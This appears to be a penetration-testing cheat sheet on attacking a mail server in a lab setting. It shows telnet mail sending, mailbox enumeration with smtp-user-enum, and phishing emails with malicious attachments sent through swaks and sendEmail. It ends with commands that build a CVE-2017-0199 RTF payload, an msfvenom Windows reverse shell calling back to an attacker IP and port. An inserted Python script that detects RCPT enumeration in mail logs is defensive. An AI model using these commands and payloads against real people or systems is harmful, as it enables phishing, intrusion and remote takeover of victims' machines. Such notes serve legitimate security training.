SMTP Server Found

Basic telnet send mail

telnet reel 25
helo pogo.com
MAIL FROM: <POGO@POGO.COM>
RCPT TO: <NICO@MEGABANK.COM>
DATA
This is the data!
.

quit

Enumerate Emails

smtp-user-enum -m 50 -M RCPT -f 'nico@megabank.com' -U users -t reel -p 25 -D megabank.com
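
On the mail server side, RCPT-based enumeration like the run above appears as a single client collecting many rejected RCPT TO replies in a short window. The Python below is an added example, not part of the original notes; the log line format, addresses, IPs and thresholds are constructed assumptions to adapt to the MTA in use.

```python
import re
from collections import defaultdict

# Constructed sample log in a made-up "client= cmd= reply=" format (an assumption;
# adapt LINE_RE to the MTA's real log format). Addresses and IPs are placeholders.
_names = ["admin", "alice", "bob", "carol", "dave", "nico", "root", "test"]
SAMPLE_LOG = "\n".join(
    [f'2024-01-01T10:00:{i:02d} client=192.0.2.10 cmd="RCPT TO:<{n}@example.test>" '
     f'reply={"250" if n == "nico" else "550"}' for i, n in enumerate(_names)]
    + ['2024-01-01T10:05:00 client=198.51.100.7 cmd="RCPT TO:<nico@example.test>" reply=250',
       '2024-01-01T10:06:00 client=198.51.100.7 cmd="RCPT TO:<nicco@example.test>" reply=550'])

LINE_RE = re.compile(
    r'client=(?P<ip>\S+) cmd="RCPT TO:<(?P<rcpt>[^>]*)>" reply=(?P<code>\d{3})', re.I)
REJECT_CODES = {"550", "551", "553"}  # mailbox unknown / not local / bad mailbox name


def find_rcpt_enumeration(log_text, min_rejects=5, min_reject_ratio=0.8):
    """Flag clients whose RCPT TO attempts are mostly rejected across many addresses."""
    stats = defaultdict(lambda: {"total": 0, "rejected": set(), "confirmed": set()})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # not an RCPT line in the assumed format
        s = stats[m["ip"]]
        s["total"] += 1
        rcpt = m["rcpt"].lower()
        if m["code"] in REJECT_CODES:
            s["rejected"].add(rcpt)
        elif m["code"].startswith("25"):  # 250/251: server accepted the recipient
            s["confirmed"].add(rcpt)
    flagged = {}
    for ip, s in stats.items():
        n_rej = len(s["rejected"])  # distinct addresses, so retries do not inflate it
        if n_rej >= min_rejects and n_rej / s["total"] >= min_reject_ratio:
            flagged[ip] = {"total": s["total"], "rejected": n_rej,
                           "confirmed": sorted(s["confirmed"])}
    return flagged


if __name__ == "__main__":
    for ip, info in find_rcpt_enumeration(SAMPLE_LOG).items():
        print(ip, info)
```

The "confirmed" list is the set of addresses the server validated for the flagged client, which are the mailboxes to watch for follow-up phishing.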

Send Email With Attachment

swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.225.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v

Attachments can be malicious in many ways.

  • Add a canary image to a Word document so that it pings back to you when opened

  • Embed malicious code in PDFs, e.g. evilpdf

  • Macros are hard to pop these days, but you could add macros to a document.

  • Generate an RTF payload: https://github.com/bhdresh/CVE-2017-0199

    • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.91 LPORT=9001 EXITFUNC=thread -f hta-psh -o htapsh.hta

    • python2 cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.10.14.91:8000/htapsh.hta